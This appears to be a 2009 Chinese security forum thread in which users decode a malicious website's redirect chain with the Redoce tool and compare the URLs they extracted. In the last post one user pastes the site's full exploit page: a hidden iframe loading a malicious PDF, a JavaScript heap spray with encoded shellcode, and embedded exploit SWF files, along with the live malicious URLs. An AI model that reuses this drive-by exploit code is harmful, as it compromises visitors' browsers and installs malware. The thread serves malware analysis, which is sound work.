http://flowersagents.com/documents

shadowmin

关于:http://flowersagents.com/documents解密的日志(全体输出 -  7):
Level  1>http://flowersagents.com/documents/load.php?e=ie6
Level  1>http://flowersagents.com/documents/load.php?e=ie6_snapshot
Level  1>http://flowersagents.com/documents/load.php?e=ie6_dx
Level  1>http://flowersagents.com/documents/load.php?e=ie6_s1
Level  2>http://flowersagents.com/documents/bc.swf  ●
Level  2>http://flowersagents.com/documents/bc.pdf
Level  3>http://flowersagents.com/documents/load.php?e=pdf
日志由 Redoce2.0第15次修正版于 2009-8-15 8:56:16 生成。

llzy3575

关于:hxxp://flowersagents.com/documents解密的日志(全体输出 -  2):

Level  0>http://flowersagents.com/documents
Level  1>http://flowersagents.com/bc.pdf

日志由 Redoce2.0第27次修正版于 2009-08-15 上午 09:41:19 生成。

404 Not Found

shadowmin

http://flowersagents.com/bc.pdf
地址错了，少了document

天涯浪子1988

膜拜
中间这些怎么解出来的：
Level  1>http://flowersagents.com/documents/load.php?e=ie6
Level  1>http://flowersagents.com/documents/load.php?e=ie6_snapshot
Level  1>http://flowersagents.com/documents/load.php?e=ie6_dx
Level  1>http://flowersagents.com/documents/load.php?e=ie6_s1
Level  2>http://flowersagents.com/documents/bc.swf  ●

shadowmin

参考剑盟上的那个，难解的PDF哪个贴子，过程，前面是一样的

天涯浪子1988

原帖由 shadowmin 于 2009-8-15 11:38 发表
参考剑盟上的那个，难解的PDF哪个贴子，过程，前面是一样的

不是的 你说的那个pdf我会解 不用神器  用redoce解压pdf文件也可以  
我说的是你第一层地址里解出来比我多几个地址  你解出来是这样的：
Level  1>http://flowersagents.com/documents/load.php?e=ie6
Level  1>http://flowersagents.com/documents/load.php?e=ie6_snapshot
Level  1>http://flowersagents.com/documents/load.php?e=ie6_dx
Level  1>http://flowersagents.com/documents/load.php?e=ie6_s1
而我解出来跟2楼的一样 只有这么一个
Level  0>http://flowersagents.com/documents
Level  1>http://flowersagents.com/bc.pdf（当然还要手动修改添加documents  不知道redoce这个地址怎么会过滤出错）
最初那段地址里一堆乱码 你有没有用什么方法处理来获取地址的  因为我是直接url过滤来的这个Level  1>http://flowersagents.com/bc.pdf地址的 且只有这一个 你那有好几个 如Level  1>http://flowersagents.com/documents/load.php?e=ie6这样的地址

[ 本帖最后由 天涯浪子1988 于 2009-8-15 13:25 编辑 ]

250662772

原帖由 天涯浪子1988 于 2009-8-15 12:42 发表

不是的 你说的那个pdf我会解 不用神器  用redoce解压pdf文件也可以  
我说的是你第一层地址里解出来比我多几个地址  你解出来是这样的：
Level  1>http://flowersagents.com/documents/load.php?e=ie6
Level  1 ...

编码问题导致的,我获取的代码

<html><HEAD><TITLE></TITLE></HEAD>
<BODY style="ZOOM: 100%"><IFRAME src="bc.pdf" width=1 height=1></IFRAME>
<SCRIPT>var memory;var nop = unescape("%u0b0b%u0b0b");var SC=unescape("%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u470E%u4E4D%u4456%u5253%u4640%u4F44%u5255%u420F%u4C4E%u450E%u424E%u4C54%u4F44%u5255%u4D0E%u404E%u0F45%u4951%u1E51%u1C44%u444F%u5256%u4756%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021");while(nop.length <= 0x10000/2)    nop+=nop;nop=nop.substring(0,0x10000/2 - SC.length);memory=new Array();for(i=0;i<0x600;i++)    {memory=nop + SC;}document.write('<object width="550" height="400">');document.write('<param name="movie" value="done.swf">');document.write('<embed src="xp.swf" width="550" height="400"></embed></object>');</SCRIPT>
<EMBED src=xp.swf width=550 height=400 type=application/x-shockwave-flash></EMBED></BODY></html>